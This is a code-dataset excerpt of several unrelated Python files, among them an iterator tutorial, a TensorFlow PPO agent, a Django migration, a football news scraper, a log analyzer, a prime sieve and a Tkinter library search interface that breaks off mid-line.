f\"The result is \", self.result\n except TypeError:\n print('The Type should be specified Correctly')\n except Exception:\n pass\n\n def __next__(self):\n print('No Value Present Please Write Once ')\n\n\nif __name__ == \"__main__\":\n Addition_no = Addition(3, 3)\n print(Addition_no.__iter__())\n print(Addition_no.__iter__())\n Addition_no.__next__()\n\n\"\"\"\n\n# Here we are taking a example of power of 2 in each iteration.Power exponent start from zero up to set numbers\n\"\"\"\nclass PowTwo:\n '''Class to Implement an Iterator of power of two '''\n\n def __init__(self, max):\n self.max = max\n\n def __iter__(self):\n self.n = 0\n return self\n\n def __next__(self):\n if self.n <= self.max:\n result = 2 ** self.n\n self.n += 1\n return result\n else:\n raise StopIteration\n\n\nif __name__ == \"__main__\":\n\n numbers = PowTwo(10)\n i = iter(numbers)\n for item in numbers:\n print(item)\n \n\"\"\"\n\n\n# Now Using Some Example to showcase iterators\nclass TopTen:\n\n def __init__(self):\n self.n = 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.n < 10:\n val = self.n\n self.n += 1\n return val\n else:\n raise StopIteration\n\n\nif __name__ == \"__main__\":\n\n TopTen_no = TopTen()\n a = iter(TopTen_no)\n for i in a:\n print(i, end=' ')\n","sub_path":"Advance Python Topics/Iterator_Example.py","file_name":"Iterator_Example.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"319024585","text":"\"\"\"\nTRPO\n\"\"\"\n\nimport numpy as np\nimport scipy.signal\nimport tensorflow as tf\nfrom gym.spaces import Box, Discrete\nfrom scipy.sparse.linalg import cg\n\nEPS = 1e-8\n\nclass PPO:\n def __init__(\n self,\n env,\n lr_pi=0.01,\n lr_v=0.01,\n gamma=0.99,\n lam=0.97,\n output_graph=False,\n seed=1,\n ep_max=100,\n ep_steps_max=4000,\n hidden_sizes=(64, 64),\n train_v_iters=80,\n train_pi_iters=80,\n clip=0.2,\n target_kl=0.01\n ):\n np.random.seed(seed)\n tf.set_random_seed(seed)\n self.lr_pi = lr_pi\n self.lr_v = lr_v\n self.gamma = gamma\n self.ep_max = ep_max\n self.ep_steps_max = ep_steps_max\n self.train_v_iters = train_v_iters\n self.train_pi_iters = train_pi_iters\n self.lam = lam\n self.clip = clip\n self.target_kl = target_kl\n\n self.s = self._get_placeholder(env.observation_space, name='observations')\n self.a = self._get_placeholder(env.action_space, name='actions')\n print(\"observations: \", self.s)\n print(\"actions: \", self.a)\n\n self._build_net(hidden_sizes=hidden_sizes, action_space=env.action_space)\n\n self.sess = tf.Session()\n\n if output_graph:\n # $ tensorboard --logdir=logs\n # http://0.0.0.0:6006/\n tf.summary.FileWriter(\"logs/\", self.sess.graph)\n\n self.sess.run(tf.global_variables_initializer())\n\n def _get_placeholder(self, space, name):\n if isinstance(space, Box):\n shape = space.shape # (act_dim, )\n dim = (None, ) if shape[0] == 1 else (None, *shape)\n # dim = (None, shape) if np.isscalar(shape) else (None, *shape)\n print(\"shape: \", shape, \" dim: \", dim)\n return tf.placeholder(dtype=tf.float32, shape=dim, name=name)\n elif isinstance(space, Discrete):\n return tf.placeholder(dtype=tf.int32, shape=(None,), name=name)\n else:\n raise NotImplementedError\n\n def _gaussian_likelihood(self, x, mu, log_std):\n pre_sum = -0.5 * (((x - mu) / (tf.exp(log_std) + EPS)) ** 2 + 2 * log_std + np.log(2 * np.pi))\n return tf.reduce_sum(pre_sum, axis=1)\n\n def _discrete_kl_divergence(self, logp1, logp2):\n return tf.squeeze(tf.reduce_sum(tf.exp(logp1) * (logp1 - logp2), axis=1))\n\n def _gaussian_kl_divergence(self, mu1, log_std1, mu2, log_std2):\n var1, var2 = tf.exp(2 * log_std1), tf.exp(2 * log_std2)\n vec_sum = log_std2 - log_std1 + 0.5 * (((mu1 - mu2)**2 + var1)/(var2 + EPS) - 1)\n return tf.squeeze(tf.reduce_sum(vec_sum, axis=1))\n\n def _mlp(self, x, hidden_sizes=(64,), activation=tf.tanh, output_activation=None):\n for h in hidden_sizes[:-1]:\n x = tf.layers.dense(x, units=h, activation=activation)\n return tf.layers.dense(x, units=hidden_sizes[-1], activation=output_activation)\n\n def _mlp_discrete_policy(self, s, a, hidden_sizes, activation, output_activation, action_space):\n \"\"\"\n generate a policy network for the discrete case\n :param s: state placeholder\n :param a: action placeholder, e.g. input the action series as list [a_1, ..., a_T]\n :param hidden_sizes: list [l1, l2, ...]\n :param activation:\n :param output_activation:\n :param action_space: env.action_space\n :return:\n pi: the action chosen by the current policy at state s\n logp_batch: the list of log probability corresponding to the list of actions a\n logp_pi: the log probability that pi is chosen\n \"\"\"\n act_dim = action_space.n\n act_logits = self._mlp(s, list(hidden_sizes)+[act_dim], activation, None) # [[xx, ..., xx]]\n logps = tf.nn.log_softmax(act_logits) # log prob. distribution of all the actions = log(soft_max) but faster\n pi = tf.squeeze(tf.multinomial(act_logits, 1), axis=1) # sample one action from act_logits [x]\n # batch: list of probabilities [P_a0, P_a1, ...]\n logp_batch = tf.reduce_sum(tf.one_hot(a, depth=act_dim) * logps, axis=1)\n logp_pi = tf.reduce_sum(tf.one_hot(pi, depth=act_dim) * logps, axis=1)\n\n self.logps_old = tf.placeholder(dtype=tf.float32, shape=(None,act_dim), name='logps_old')\n kl_divergence = self._discrete_kl_divergence(logps, self.logps_old)\n return pi, logp_batch, logp_pi #, logps, kl_divergence\n\n def _mlp_gaussian_policy(self, s, a, hidden_sizes, activation, output_activation, action_space):\n \"\"\"\n generate a policy network for the continuous case\n :param s: state placeholder\n :param a: action placeholder, e.g. input the action matrix\n a = [[a_11, ..., a_D1],\n [a_12, ..., a_D2],\n ...\n [a_1T, ..., a_DT]]\n :param hidden_sizes: list [l1, l2, ...]\n :param activation:\n :param output_activation:\n :param action_space: env.action_space\n :return:\n pi: the action chosen by the current policy at state s\n logp_batch: the list of log probability corresponding to the list of actions a\n logp_pi: the log probability that pi is chosen\n \"\"\"\n act_dim = action_space.shape[0]\n\n l1 = tf.layers.dense(s, 100, tf.nn.relu, trainable=True)\n mu = 2 * tf.layers.dense(l1, act_dim, tf.nn.tanh, trainable=True)\n std = tf.layers.dense(l1, act_dim, tf.nn.softplus, trainable=True)\n norm_dist = tf.distributions.Normal(loc=mu, scale=std)\n # pi = tf.squeeze(norm_dist.sample(1), axis=0)\n pi = mu + tf.random_normal(tf.shape(mu)) * std\n logp_pi = norm_dist.prob(pi)\n logp_batch = norm_dist.prob(a)\n\n # mu = self._mlp(s, list(hidden_sizes)+[act_dim], activation, output_activation)\n # log_std = tf.get_variable(name='log_std', initializer=-0.5 * np.ones(act_dim, dtype=np.float32))\n # std = tf.exp(log_std)\n # pi = mu + tf.random_normal(tf.shape(mu)) * std\n # logp_batch = self._gaussian_likelihood(a, mu, log_std)\n # logp_pi = self._gaussian_likelihood(pi, mu, log_std)\n\n # mu_old = tf.placeholder(dtype=tf.float32, shape=(None,act_dim), name='mu_old')\n # log_std_old = tf.placeholder(dtype=tf.float32, shape=(None,act_dim), name='log_std_old')\n # kl_divergence = self._gaussian_kl_divergence(mu, log_std, mu_old, log_std_old)\n return pi, logp_batch, logp_pi #, mu, log_std, kl_divergence\n\n def _build_net(self, hidden_sizes=(30,30), activation=tf.tanh, output_activation=None, policy=None, action_space=None):\n # to be stored during the episode\n self.ep_s, self.ep_a, self.ep_r, self.ep_v = [], [], [], []\n self.ep_logps, self.ep_logp_pi = [], []\n\n # placeholders for calculation of loss functions\n self.ep_ret = tf.placeholder(dtype=tf.float32, shape=(None,), name='ep_returns')\n self.ep_adv = tf.placeholder(dtype=tf.float32, shape=(None,), name='ep_advantages')\n self.logp_old = tf.placeholder(dtype=tf.float32, shape=(None,), name='logp_old')\n\n # default policy\n if policy is None and isinstance(action_space, Box):\n policy = self._mlp_gaussian_policy\n elif policy is None and isinstance(action_space, Discrete):\n policy = self._mlp_discrete_policy\n\n with tf.variable_scope('actor'): # TODO\n # self.pi, logp_batch, self.logp_pi, self.logps, self.d_kl = \\\n self.pi, logp_batch, self.logp_pi = \\\n policy(self.s, self.a, hidden_sizes, activation, output_activation, action_space)\n with tf.variable_scope('critic'):\n # self.v = tf.squeeze(self._mlp(self.s, list(hidden_sizes)+[1], activation, None), axis=1)\n self.v = tf.squeeze(self._mlp(self.s, list(hidden_sizes)+[1], activation, None), axis=1)\n\n ratio = tf.exp(logp_batch - self.logp_old)\n min_adv = tf.where(self.ep_adv>0, (1+self.clip)*self.ep_adv, (1-self.clip)*self.ep_adv)\n self.pi_loss = -tf.reduce_mean(tf.minimum(ratio * self.ep_adv, min_adv))\n self.v_loss = tf.reduce_mean((self.ep_ret - self.v)**2)\n with tf.name_scope('train'):\n self.train_pi = tf.train.AdamOptimizer(self.lr_pi).minimize(self.pi_loss)\n self.train_v = tf.train.AdamOptimizer(self.lr_v).minimize(self.v_loss)\n\n self.d_kl = tf.reduce_mean(self.logp_old - logp_batch)\n\n def _get_vars(self, scope=''):\n return [x for x in tf.trainable_variables() if scope in x.name]\n\n def _flat_concat(self, xs):\n return tf.concat([tf.reshape(x, (-1,)) for x in xs], axis=0)\n\n def _flat_grad(self, f, params):\n grads = tf.gradients(xs=params, ys=f)\n return tf.concat([tf.reshape(x, (-1,)) for x in grads], axis=0)\n\n def _hessian_vector_product(self, f, params):\n # for H = grad**2 f, compute Hx\n g = self._flat_grad(f, params)\n x = tf.placeholder(tf.float32, shape=g.shape)\n return x, self._flat_grad(tf.reduce_sum(g * x), params)\n\n def _assign_params_from_flat(self, x, params):\n flat_size = lambda p: int(np.prod(p.shape.as_list())) # get number of params in a tensor\n splits = tf.split(x, [flat_size(p) for p in params])\n new_params = [tf.reshape(p_new, p.shape) for p, p_new in zip(params, splits)]\n return tf.group([tf.assign(p, p_new) for p, p_new in zip(params, new_params)])\n\n def _choose_action(self, s):\n a = self.sess.run(self.pi, feed_dict={self.s: s[np.newaxis, :]})\n return a\n\n def _get_agent_status(self, s):\n # a, logp_pi, logps, v = self.sess.run([self.pi, self.logp_pi, self.logps, self.v],\n # feed_dict={self.s: s[np.newaxis, :]})\n a, logp_pi, v = self.sess.run([self.pi, self.logp_pi, self.v],\n feed_dict={self.s: s[np.newaxis, :]})\n return a, logp_pi, v,\n\n def _store_transition(self, s, a, r, v, p, ps):\n self.ep_s.append(s)\n self.ep_a.append(a)\n self.ep_r.append(r)\n self.ep_v.append(v)\n self.ep_logp_pi.append(p)\n self.ep_logps.append(ps)\n\n def _process_rollout(self, last_value):\n ep_r = np.append(self.ep_r, last_value)\n ep_v = np.append(self.ep_v, last_value)\n\n ep_ret = self._discounted_sum_vec(ep_r, self.gamma)[:-1]\n # ep_ret -= np.mean(ep_ret)\n # ep_ret /= np.std(ep_ret)\n\n deltas = ep_r[:-1] + self.gamma * ep_v[1:] - ep_v[:-1]\n ep_adv = self._discounted_sum_vec(deltas, self.gamma * self.lam)\n ep_adv -= np.mean(ep_adv)\n ep_adv /= np.std(ep_adv)\n return ep_ret, ep_adv\n\n def _discounted_sum_vec(self, x, discount):\n return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]\n\n def _conjugate_gradient(self, Ax, b):\n x = np.zeros_like(b)\n r = b.copy() # Note: should be 'b - Ax(x)', but for x=0, Ax(x)=0. Change if doing warm start.\n p = r.copy()\n r_dot_old = np.dot(r, r)\n for _ in range(self.cg_iters):\n z = Ax(p)\n alpha = r_dot_old / (np.dot(p, z) + EPS)\n x += alpha * p\n r -= alpha * z\n r_dot_new = np.dot(r, r)\n p = r + (r_dot_new / r_dot_old) * p\n r_dot_old = r_dot_new\n return x\n\n def _set_and_eval(self, x, alpha, old_params, inputs, step):\n self.sess.run(self.set_pi_params, feed_dict={self.v_ph: old_params - alpha * x * step})\n return self.sess.run([self.d_kl, self.pi_loss], feed_dict=inputs)\n # {self.s: np.vstack(self.ep_s),\n # self.a: np.squeeze(np.array(self.ep_a))})\n\n def _update(self):\n ep_s = np.vstack(self.ep_s)\n ep_a = np.squeeze(np.array(self.ep_a))\n ep_p = np.squeeze(np.array(self.ep_logp_pi))\n # ep_logps = np.vstack(self.ep_logps)\n self.inputs = {self.s: ep_s,\n self.a: ep_a,\n self.ep_adv: self.ep_Adv,\n self.ep_ret: self.ep_G,\n # self.logps_old: ep_logps,\n self.logp_old: ep_p\n }\n for i in range(self.train_pi_iters):\n d_kl, _ = self.sess.run([self.d_kl, self.train_pi], feed_dict=self.inputs)\n if d_kl > 1.5 * self.target_kl:\n print('KL divergence %f exceed threshold %f, early stop at step %d!' % (d_kl, self.target_kl, i))\n break\n\n for _ in range(self.train_v_iters):\n self.sess.run(self.train_v, feed_dict=self.inputs)\n\n self.ep_s, self.ep_a, self.ep_r, self.ep_v = [], [], [], []\n self.ep_logps, self.ep_logp_pi = [], [] # empty episode data\n\n def train(self, env, render_threshold_reward, render=False):\n for ep_index in range(self.ep_max):\n s = env.reset()\n for step_index in range(self.ep_steps_max):\n if render:\n env.render()\n a, logp_pi, v = self._get_agent_status(s)\n a = np.clip(a, -2, 2)\n\n s_, r, done, _ = env.step(a[0])\n\n self._store_transition(s, a, r, v, logp_pi, [1])\n\n terminal = done or (step_index == self.ep_steps_max-1)\n if terminal:\n # calculate running reward\n ep_rs_sum = sum(self.ep_r)\n if 'running_reward' not in globals():\n running_reward = ep_rs_sum\n else:\n running_reward = running_reward * 0.99 + ep_rs_sum * 0.01\n if running_reward > render_threshold_reward:\n render = True # rendering\n print(\"episode:\", ep_index, \" reward:\", int(running_reward))\n\n v_ = r if done else self.sess.run(self.v, feed_dict={self.s: s_.reshape(1, -1)})\n done = False\n self.ep_G, self.ep_Adv = self._process_rollout(v_)\n self._update()\n\n break\n\n s = s_\n","sub_path":"contents/12_Proximal_Policy_Optimization/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":14195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"83623053","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWe need to move from our earlier DurationField to the now-built-in Django\nDurationField. In this migration we create the new field; in migration 20 we'll\ncopy over the data. In 21 we'll delete the old field, and in 22 we'll rename the\nnew one to the old name so as to present the expected API.\n\"\"\"\n\n\nfrom django.db import migrations, models\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"resources\", \"0018_auto_20161213_1603\")]\n\n operations = [\n migrations.AddField(\n model_name=\"partner\",\n name=\"access_grant_term_pythonic\",\n field=models.DurationField(\n default=datetime.timedelta(365), null=True, blank=True\n ),\n ),\n migrations.AlterField(\n model_name=\"contact\", name=\"email\", field=models.EmailField(max_length=254)\n ),\n ]\n","sub_path":"TWLight/resources/migrations/0019_auto_20161216_1650.py","file_name":"0019_auto_20161216_1650.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"524684126","text":"'''\r\nFunctions that will follow the process for analysing the suburls found in the baseurls\r\n'''\r\nimport os\r\nfrom football_functions.generic import pull_html\r\nimport football_functions.source_specific.bbc.process_html as bbc\r\nimport football_functions.source_specific.dailymail.process_html as dailymail\r\nimport football_functions.source_specific.mirror.process_html as mirror\r\nimport football_functions.source_specific.guardian.process_html as guardian\r\n\r\ndef extract_urls(html_loc, organ_loc, date_today, domain_list = None):\r\n '''\r\n Function that will extract the suburls from the HTML found in the baseurls\r\n Takes the location of /Data/HTML and Data/Organisation\r\n '''\r\n\r\n if domain_list is None:\r\n domain_list = os.listdir(html_loc)\r\n\r\n # Start by looping over all the domains we find in the HTML data folder\r\n for domain in domain_list:\r\n print('Now looking at sources from {}'.format(domain))\r\n\r\n # We will then loop over all the HTML we find there to start pulling those URLs\r\n search_path = html_loc + domain + '/' + date_today + '/' + 'base_urls'\r\n for html_file in os.listdir(search_path):\r\n html_path = search_path + '/' + html_file\r\n links = []\r\n \r\n # Will only process certain URLsfor each domain\r\n if domain == 'bbc' and 'teams' in html_file:\r\n links.extend(bbc.get_suburls(html_path))\r\n\r\n if domain == 'dailymail' and 'sport_football' in html_file:\r\n links.extend(dailymail.get_suburls(html_path))\r\n\r\n if domain == 'mirror' and 'sport_football' in html_file:\r\n links.extend(mirror.get_suburls(html_path))\r\n\r\n if domain == 'theguardian' and 'teams' in html_file:\r\n links.extend(guardian.get_suburls(html_path))\r\n\r\n # If we have found some links then print them to file in organ_loc\r\n if len(links) != 0:\r\n print('Have found {} links from {}'.format(len(links), domain))\r\n sublinks_path = organ_loc + domain + '/' + date_today + '/'\r\n \r\n # Check if exists\r\n if not os.path.exists(sublinks_path):\r\n print('Making directory {}'.format(sublinks_path))\r\n os.makedirs(sublinks_path)\r\n \r\n print('Writing links file')\r\n with open(sublinks_path + 'sublinks.txt', 'w') as sublink_file:\r\n for link in links:\r\n sublink_file.write('{}\\n'.format(link))\r\n \r\n print('Finished writing to file\\n')\r\n\r\ndef scrape_urls(organ_loc, html_loc, date_today, proxy):\r\n '''\r\n Function that will scrape the suburls found in the baseurls and then save the HTML\r\n So this is executed after the extract_urls function on the links that were saved\r\n '''\r\n error_report = []\r\n mode = 'sublinks'\r\n\r\n # Start by looping the domains we find in the organisation folder - ignoring any non directories\r\n for domain in [domain for domain in os.listdir(organ_loc) if '.' not in domain]:\r\n sublink_path = organ_loc + domain + '/' + date_today + '/sublinks.txt'\r\n\r\n with open(sublink_path, 'r') as sublink_file:\r\n for url in sublink_file.readlines():\r\n error_report.append(pull_html.process_url(url.rstrip(), html_loc, mode, date_today, proxy))\r\n \r\n num_urls = len(error_report)\r\n num_failed = len([(url, error) for url, error in error_report if error != 'No error'])\r\n print('Finished reading {} URLs, of which {} failed'.format(num_urls, num_failed))\r\n\r\n return error_report","sub_path":"Back_ups/football_functions_v1/processes/html_extraction/suburls.py","file_name":"suburls.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"271224657","text":"class Analyzer:\n \"\"\"log analyzer\n\n The program reads the file and outputs\n the number of NOK events per minute\n to another file in a convenient format,\n having previously grouped by hours, months, years.\n\n Input data\n file_name -------------- filename to scan\n write_file_name -------- filename to write\n\n \"\"\"\n\n def __init__(self, file_name, write_file_name=None):\n self.file_name = file_name\n self.write_file_name = write_file_name\n self.stat = {}\n\n # Creating a dictionary with specified conditions\n def creating_a_list_of_events(self):\n\n with open(self.file_name, 'r', encoding='UTF8') as file:\n for line in file:\n data = line[1:17]\n not_ok = line[-4:-1]\n if not_ok == 'NOK':\n if data in self.stat:\n self.stat[data] += 1\n else:\n self.stat[data] = 1\n\n # Writing a sorted dictionary to a file\n def write_to_file(self):\n if self.write_file_name == None:\n self.write_file_name = 'NOK_' + self.file_name\n with open(self.write_file_name, 'w', encoding='UTF8') as file:\n for key, value in self.stat.items():\n file.write('[' + str(key) + '] ' + str(value) + '\\n')\n\n def grouping_by_hour(self):\n start_to_cut = 11\n end_cut = 13\n self.grouping(start_to_cut, end_cut)\n\n def grouping_by_month(self):\n start_to_cut = 5\n end_cut = 7\n self.grouping(start_to_cut, end_cut)\n\n def grouping_by_year(self):\n start_to_cut = 0\n end_cut = 4\n self.grouping(start_to_cut, end_cut)\n\n def grouping(self, start_to_cut, end_cut):\n grouped_data = {}\n for i in self.stat.keys():\n sort_value = i[start_to_cut: end_cut]\n\n if sort_value in grouped_data.keys():\n grouped_data[sort_value].update({i: self.stat[i]})\n else:\n grouped_data[sort_value] = {}\n grouped_data[sort_value].update({i: self.stat[i]})\n\n self.write_grouping(grouped_data)\n\n def write_grouping(self, dict):\n dict = dict\n with open(self.write_file_name, 'w') as file:\n for key, dict_2 in dict.items():\n for key_dict2, value in dict_2.items():\n file.write(\n str(key) + '-> [' + (\n str(key_dict2) + '] ' + str(value) + '\\n'))\n\n\ntest = Analyzer(file_name='events.txt')\ntest.creating_a_list_of_events()\ntest.write_to_file()\ntest.grouping_by_hour()\n","sub_path":"log_parser.py","file_name":"log_parser.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"285346997","text":"import heapq\n\nclass Primes():\n\tdef __init__(self):\n\t\tself.n = 1\n\t\tself.pq = []\n\t\tself.primes = []\n\t\tself.dict = {}\n\n\tdef __call__(self, bound=None, count=None):\n\t\treturn self.PrimeIter(self, bound, count)\n\n\tdef next_prime(self):\n\t\tif self.n <= 2:\n\t\t\tif self.n == 1:\n\t\t\t\tself.n = 2\n\t\t\t\tself.primes.append(2)\n\t\t\t\treturn 2\n\t\t\telif self.n == 2:\n\t\t\t\tself.n = 3\n\t\t\t\theapq.heappush(self.pq, (9,3))\n\t\t\t\tself.primes.append(3)\n\t\t\t\treturn 3\n\n\t\tself.n += 2\n\t\twhile True:\n\t\t\t(m,p) = heapq.heappop(self.pq)\n\t\t\tif m < self.n:\n\t\t\t\theapq.heappush(self.pq, (m+2*p,p))\n\t\t\t\tcontinue\n\t\t\telif m == self.n:\n\t\t\t\theapq.heappush(self.pq, (m+2*p,p))\n\t\t\t\tself.n += 2\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tn = self.n\n\t\t\t\theapq.heappush(self.pq, (m,p))\n\t\t\t\theapq.heappush(self.pq, (n*n,n))\n\t\t\t\tself.dict[n] = 1\n\t\t\t\tself.primes.append(n)\n\t\t\t\treturn n\n\n\tdef is_prime(self, q):\n\t\twhile q > self.n:\n\t\t\tself.next_prime()\n\t\treturn self.dict.has_key(q)\n\t\t\t\n\tclass PrimeIter():\n\t\tdef __init__(self, sieve, bound=None, count=None):\n\t\t\tself.idx = 0\n\t\t\tself.bound = bound\n\t\t\tself.count = count\n\t\t\tself.sieve = sieve\n\n\t\tdef __iter__(self):\n\t\t\treturn self\n\n\t\tdef next(self):\n\t\t\tif self.count and self.idx >= self.count:\n\t\t\t\traise StopIteration\n\t\t\tif self.idx >= len(self.sieve.primes):\n\t\t\t\tfor i in xrange(10000):\n\t\t\t\t\tself.sieve.next_prime()\n\t\t\tp = self.sieve.primes[self.idx]\n\t\t\tif self.bound and p > self.bound:\n\t\t\t\traise StopIteration\n\t\t\tself.idx += 1\n\t\t\treturn p\n","sub_path":"euler/primes2.py","file_name":"primes2.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"131934253","text":"import xadmin\nfrom .models import ShopCart, OrderInfo, OrderDetail\n\n\nclass ShopCartAdmin(object):\n list_display = ['user', 'goods', 'nums', 'add_time']\n list_filter = ['user', 'goods', 'nums']\n search_fields = ['user', 'goods', 'nums', 'add_time']\n\n\nclass OrderInfoAdmin(object):\n list_display = ['user', 'order_sn', 'trade_sn', 'pay_status', 'post_script',\n 'order_mount', 'pay_time', 'add_time']\n list_filter = ['user', 'order_sn', 'trade_sn', 'pay_status', 'post_script',\n 'order_mount', 'pay_time']\n search_fields = ['user', 'order_sn', 'trade_sn', 'pay_status', 'post_script',\n 'order_mount', 'pay_time', 'add_time']\n\n\n\nclass OrderDetailAdmin(object):\n list_display = ['order', 'goods', 'goods_num', 'add_time']\n list_filter = ['order', 'goods', 'goods_num']\n search_fields =['order', 'goods', 'goods_num', 'add_time']\n\n\nxadmin.site.register(ShopCart, ShopCartAdmin)\nxadmin.site.register(OrderInfo, OrderInfoAdmin)\nxadmin.site.register(OrderDetail, OrderDetailAdmin)","sub_path":"vue/apps/trade/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"318243126","text":"from datetime import datetime, timedelta\r\nimport tkinter as tk\r\nfrom tkinter import OptionMenu, ttk\r\nfrom tkinter.constants import ACTIVE, DISABLED # we will use this later on...\r\nfrom tkinter import messagebox\r\nimport io\r\nfrom PIL import Image, ImageTk\r\nfrom urllib.request import urlopen\r\nimport pandas as pd\r\n\r\nimport BkSearch as bksearch\r\nimport bookborrow as bkborrow\r\n\r\n# categories = [\".NET\", \"Algorithmic Art\", \"Business\", \"Client Server\", \"Client-Server\", \"Computer Graph\",\r\n# \"Computer Graphics\", \"In Action\", \"Internet\", \"Java\", \"Microsoft\", \"Microsoft .NET\", \"Microsoft/.NET\", \"Miscella\", \"Miscellaneous\", \"Mobile\", \"Mobile Technology\", \"Networking\", \"Next Generation Databases\", \"Object-Oriented Programming\", \"Object-Technology Programming\", \"Open Source\", \"P\", \"PHP\", \"Perl\", \"PowerBuilder\", \"Programming\", \"Python\", \"S\", \"SOA\", \"Software Development\", \"Software Engineering\", \"Theory\", \"Web Development\", \"XML\", \"internet\", \"java\"]\r\n\r\noptions = {\"Title\": [], \"ISBN\": [], \r\n \"Page Count\": [\"Lesser\", \"Equal\", \"Greater\"],\r\n \"Published Year\": [\"Before\", \"Equal\", \"After\"], \r\n \"Categories\": [], \"Authors\": []}\r\n\r\nclass SearchDisplay(tk.Frame):\r\n def __init__(self, parent, controller, session_user_data):\r\n super().__init__(parent)\r\n self.parent, self.controller = parent, controller\r\n ## Unpack User Session Variables ##\r\n print(session_user_data)\r\n self.user_data = session_user_data\r\n self.user_name = session_user_data[\"userId\"]\r\n self.user_unpaid_fines = session_user_data[\"unpaid_fines\"]\r\n self.user_borrowed = session_user_data[\"borrowed\"]\r\n self.user_reserved = session_user_data[\"reserved\"]\r\n \r\n ## Page Variables ##\r\n # Search Bar #\r\n self.search_text = tk.StringVar()\r\n self.adv_dropdown = tk.StringVar()\r\n self.adv_dropdown.set(\"\")\r\n self.sub_adv_dropdown = tk.StringVar()\r\n self.sub_adv_dropdown.set(\"\")\r\n # Search Results Treeview Display #\r\n self.treedata = tk.StringVar()\r\n \r\n # Book Details Display #\r\n self.photos = {}\r\n self.bk_title = tk.StringVar()\r\n self.bk_author = tk.StringVar()\r\n self.bk_desc = tk.StringVar()\r\n self.bk_status = tk.StringVar()\r\n \r\n self.bk_selected_id = -1 #Currently selected BookId\r\n self.bk_selected_title = \"\"\r\n self.bk_selected_due = \"\"\r\n\r\n self.create_widgets()\r\n\r\n def create_widgets(self):\r\n \"\"\"\r\n Use the following widget abbreviations\r\n Label \tlbl \tlbl_name\r\n Button \tbtn \tbtn_submit\r\n Entry \tent \tent_age\r\n Text \ttxt \ttxt_notes\r\n Frame \tfrm \tfrm_address\r\n \"\"\"\r\n #### Page Content ####\r\n frm_content = tk.Frame(master=self)\r\n frm_content.columnconfigure(0, weight=1)\r\n frm_content.rowconfigure(0, weight=1)\r\n frm_content.rowconfigure(1, weight=10)\r\n frm_content.rowconfigure(2, weight=2)\r\n frm_content.pack(fill=tk.BOTH, pady=(5,20), expand=True)\r\n\r\n # Some general styling vars\r\n HOME_CONTENT_PADX = 20\r\n\r\n ### Search ###\r\n frm_search = tk.Frame(master=frm_content, borderwidth=1)\r\n frm_search.grid(row=0, column=0, padx=HOME_CONTENT_PADX,\r\n pady=(0, 10), sticky=\"nsew\")\r\n\r\n ## Top row: Header and Error Display ##\r\n frm_search_top = tk.Frame(master=frm_search)\r\n frm_search_top.pack(fill=tk.X,pady=(5,0))\r\n # Label #\r\n lbl_search = tk.Label(master=frm_search_top,text=\"Search Catalog\")\r\n lbl_search.pack(side=tk.LEFT,anchor=\"w\",padx=(0,10))\r\n # Error Display\r\n self.lbl_msg_display = tk.Label(frm_search_top, text=\"\", font=(\"\", 10))\r\n self.lbl_msg_display.pack(side=tk.LEFT,anchor=\"w\")\r\n\r\n ## Top row : Entry + Button ##\r\n frm_search_mid = tk.Frame(master=frm_search)\r\n frm_search_mid.pack(fill=tk.BOTH, expand=True)\r\n\r\n # Search Entry #\r\n search_bar = tk.Entry(master=frm_search_mid,\r\n textvariable=self.search_text)\r\n search_bar.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\r\n\r\n # Search Button #\r\n btn_search = tk.Button(master=frm_search_mid, text=\"Search\", height=1, padx=10,\r\n bg=\"lightblue\",activebackground=\"lightblue\",\r\n command=self.on_search_req_btn_press)\r\n btn_search.pack(side=tk.RIGHT, fill=tk.Y,padx=(5,0))\r\n\r\n \r\n # Bottom row - Advanced search\r\n frm_search_btm = tk.Frame(master=frm_search)\r\n frm_search_btm.pack(fill=tk.X, expand=True, pady=(5,0))\r\n\r\n # Drop Down: Advanced Search #\r\n self.drop = ttk.Combobox(frm_search_btm,state=\"readonly\",width=15)\r\n self.drop['values'] = list(options.keys())\r\n self.drop.current(0)\r\n self.drop.pack(side=tk.LEFT, fill=tk.Y)\r\n self.drop.bind('<>', self.getUpdateData)\r\n\r\n # Drop Down: Sub Advanced Search #\r\n self.sub_drop = ttk.Combobox(frm_search_btm, state=\"readonly\",width=10)\r\n \r\n #### Search Result Display Treeview ####\r\n frm_results = tk.Frame(master=frm_content, borderwidth=1)\r\n # browse - only 1 item can be selected\r\n tv = ttk.Treeview(frm_results, selectmode=\"browse\")\r\n tv.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\r\n\r\n ## Configure Treeview ##\r\n HEADINGS = ('Id', 'Title', 'Status', 'Reserved')\r\n tv['columns'] = HEADINGS\r\n tv[\"show\"] = \"headings\" # supresses icon(#0) column\r\n # tv.heading(\"#0\", text='Sources', anchor='w')\r\n # tv.column(\"#0\", anchor=\"w\")\r\n\r\n # Set headings (column names)\r\n for h in HEADINGS:\r\n tv.heading(h, text=h)\r\n # Set column sizing\r\n tv.column(HEADINGS[0], anchor='center', width=40,\r\n minwidth=40, stretch=True)\r\n tv.column(HEADINGS[1], anchor='w',\r\n width=300, minwidth=200, stretch=True)\r\n tv.column(HEADINGS[2], anchor='center',\r\n width=100, minwidth=80, stretch=True)\r\n tv.column(HEADINGS[3], anchor='center', width=100, 